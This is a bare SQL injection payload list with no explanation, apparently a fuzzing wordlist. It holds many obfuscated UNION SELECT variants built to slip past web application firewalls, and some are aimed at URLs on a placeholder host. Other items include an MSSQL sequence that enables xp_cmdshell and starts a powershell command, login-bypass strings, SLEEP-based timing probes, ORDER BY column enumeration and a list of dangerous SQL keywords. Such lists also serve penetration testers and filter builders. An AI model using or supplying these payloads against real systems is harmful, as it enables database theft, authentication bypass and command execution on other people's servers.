Union Select 0,0,0,0
Union Select false,false,false,false
Union Select char(null),char(null),char(null),char(null)
Union Select char(false),char(false),char(false),char(false)
Union Select (0*1337-0),(0*1337-0),(0*1337-0),(0*1337-0)
Union Select 34=35,34=35,34=35,34=35
Union Select null,null,null,null
; EXEC sp_configure ‘show advanced options’, 1; RECONFIGURE; EXEC sp_configure ‘xp_cmdshell’, 1; RECONFIGURE;--
;EXEC xp_cmdshell ‘powershell -c “$x = whoami;
/*!50000%55nIoN*/ /*!50000%53eLeCt*/ null,null,null,null
%55nion(%53elect 1,2,3) null,null,null,null
http://domain.com/index.php?id=1+union+distinctROW+select+null,null,null,null--+-
http://domain.com/index.php?id=1+ #?uNiOn + #?sEleCt null,null,null,null
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt null,null,null,null
/*!%55NiOn*/ /*!%53eLEct*/ null,null,null,null
+un/**/ion+se/**/lect null,null,null,null
+?UnI?On?+'SeL?ECT? null,null,null,null
http://domain.com/index.php?id=1+(UnIoN)+(SelECT)+null,null,null,null--+-
+UnIoN/*&a=*/SeLeCT/*&a=*/ null,null,null,null
%55nion(%53elect null,null,null,null)
/**//*!12345UNION SELECT*//**/ null,null,null,null
/**//*!50000UNION SELECT*//**/ null,null,null,null
/**/UNION/**//*!50000SELECT*//**/ null,null,null,null
/*!50000UniON SeLeCt*/ null,null,null,null
union /*!50000%53elect*/ null,null,null,null
/*!u%6eion*/ /*!se%6cect*/ null,null,null,null
/*--*/union/*--*/select/*--*/ null,null,null,null
union (/*!/**/ SeleCT */ null,null,null,null)
/*!union*/+/*!select*/ null,null,null,null
/**/uNIon/**/sEleCt/**/ null,null,null,null
+%2F**/+Union/*!select*/ null,null,null,null
/**//*!union*//**//*!select*//**/ null,null,null,null
/*!uNIOn*/ /*!SelECt*/ null,null,null,null
/**/union/*!50000select*//**/ null,null,null,null
0%a0union%a0select%09 null,null,null,null
%0Aunion%0Aselect%0A null,null,null,null
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ null,null,null,null
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/ null,null,null,null
/*!union*//*--*//*!all*//*--*//*!select*/ null,null,null,null
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C null,null,null,null
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ null,null,null,null
+UnIoN/*&a=*/SeLeCT/*&a=*/ null,null,null,null
union+sel%0bect null,null,null,null
+#1q%0Aunion all#qa%0A#%0Aselect null,null,null,null
%23xyz%0AUnIOn%23xyz%0ASeLecT+ null,null,null,null
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+ null,null,null,null
union(select(null),null,null)
uNioN (/*!/**/ SeleCT */ 11) null,null,null,null
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/ null,null,null,null
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/ null,null,null,null
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C null,null,null,null
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/ null,null,null,null
+UnIoN/*&a=*/SeLeCT/*&a=*/ null,null,null,null
+/*!UnIoN*/+/*!SeLeCt*/+ null,null,null,null
/*!u%6eion*/ /*!se%6cect*/ null,null,null,null
uni%20union%20/*!select*/%20 null,null,null,null
union%23aa%0Aselect null,null,null,null
http://domain.com/index.php?id=1/**/union/*!50000select*/ null,null,null,null
/^****union.*$/ /^****select.*$/ null,null,null,null
/*union*/union/*select*/select+ null,null,null,null
/*!50000UnION*//*!50000SeLeCt*/ null,null,null,null
%252f%252a*/union%252f%252a /select%252f%252a*/ null,null,null,null
AnD null UNiON SeLeCt null,null,null,null;%00 
AnD null UNiON SeLeCt null,null,null,null+--+-
And False Union Select null,null,null,null+--+-
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)
union+distinctROW+select+1,2,3,4-- -
#?uNiOn + #?sEleCt
#?1q %0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
+un/**/ion+se/**/lect
+?UnI?On?+'SeL?ECT?
(UnIoN)+(SelECT)+1,2,3,4-- -
+UnIoN/*&a=*/SeLeCT/*&a=*/
%55nion(%53elect 1,2,3,4)-- -
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
/*!u%6eion*/ /*!se%6cect*/
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3,4)-- -
/*!union*/+/*!select*/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+#1q%0Aunion all#qa%0A#%0Aselect
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
uNioN (/*!/**/ SeleCT */ 11)
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^****union.*$/ /^****select.*$/
/*union*/union/*select*/select+
/*!50000UnION*//*!50000SeLeCt*/
%252f%252a*/union%252f%252a /select%252f%252a*/
/*!50000%55nIoN*/ /*!50000%53eLeCt*/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
%55nion(%53elect 1,2,3) 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
http://domain.com/index.php?id=1&+n=19901'+union+distinctROW+select+1,2,3,4,5,6,7,8,9,10,12,13,14--+-
#?uNiOn + #?sEleCt 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
/*!%55NiOn*/ /*!%53eLEct*/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
+un/**/ion+se/**/lect 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
+?UnI?On?+'SeL?ECT? 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
http://domain.com/index.php?id=1& n=19901'(UnIoN)+(SelECT)+1,2,3,4,5,6,7,8,9,10,12,13,14--+-
+UnIoN/*&a=*/SeLeCT/*&a=*/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
%55nion(%53elect 1,2,3,4,5,6,7,8,9,10,12,13,14)-- -
/**//*!12345UNION SELECT*//**/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
/**//*!50000UNION SELECT*//**/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
/**/UNION/**//*!50000SELECT*//**/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
/*!50000UniON SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
union /*!50000%53elect*/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
/*!u%6eion*/ /*!se%6cect*/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
/*--*/union/*--*/select/*--*/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
union (/*!/**/ SeleCT */ 1,2,3,4,5,6,7,8,9,10,12,13,14)-- -
/*!union*/+/*!select*/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
/**/uNIon/**/sEleCt/**/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
+%2F**/+Union/*!select*/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
/**//*!union*//**//*!select*//**/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
/*!uNIOn*/ /*!SelECt*/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
/**/union/*!50000select*//**/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
0%a0union%a0select%09 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
%0Aunion%0Aselect%0A 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
/*!union*//*--*//*!all*//*--*//*!select*/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
+UnIoN/*&a=*/SeLeCT/*&a=*/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
union+sel%0bect 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
+#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
%23xyz%0AUnIOn%23xyz%0ASeLecT+ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
union(select(1),2,3)-- -
uNioN (/*!/**/ SeleCT */ 11) 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
+UnIoN/*&a=*/SeLeCT/*&a=*/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
+/*!UnIoN*/+/*!SeLeCt*/+ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
/*!u%6eion*/ /*!se%6cect*/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
uni%20union%20/*!select*/%20 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
union%23aa%0Aselect 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
/**/union/*!50000select*/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
/^****union.*$/ /^****select.*$/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
/*union*/union/*select*/select+ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
/*!50000UnION*//*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
%252f%252a*/union%252f%252a /select%252f%252a*/ 1,2,3,4,5,6,7,8,9,10,12,13,14-- -
AnD null UNiON SeLeCt 1,2,3,4,5,6,7,8,9,10,12,13,14;%00-- -
AnD null UNiON SeLeCt 1,2,3,4,5,6,7,8,9,10,12,13,14+--+-
And False Union Select 1,2,3,4,5,6,7,8,9,10,12,13,14+--+-
database/*badd*//**/()
database%23%0A(%23%0A)
%27
\x22
%22
char
;
ascii
%3B
%2B
--
%2D%2D
/*
%2F%2A
*/
%2A%2F
substring
drop table
drop+table
insert into
insert+into
version(
values
group by
group+by
create table
create+table
delete
update
bulk insert
bulk+insert
load_file
shutdown
union
having
select
declare
exec
and
or
like
@@hostname
@@tmpdir
is null
is+null
is not null
is+not+null
%3D
CONCAT
%40%40basedir
version%28,user(
user%28,system_user(
(,%28,)
%29
@
%40
cast
UNION ALL SELECT 'INJ'||'ECT'||'
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))
UNION ALL SELECT NULL
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))-- 
UNION ALL SELECT USER()-- 
UNION ALL SELECT SLEEP(5)--
or%201=1
cmd
attack
%27
?%27%20OR%20%271
%27%27%27%27%27%27%27%27%27%27%27%27%27UNION%20SELECT%20%272
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
admin'
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin"
OR 1=
OR x=
HAVING 1=
AND 1=
AS INJECTX WHERE 1=
WHERE 1=1 AND 1=
ORDER BY 1--
ORDER BY 2--
ORDER BY 3--
ORDER BY 4--
ORDER BY 5--
ORDER BY 6--
ORDER BY 7--
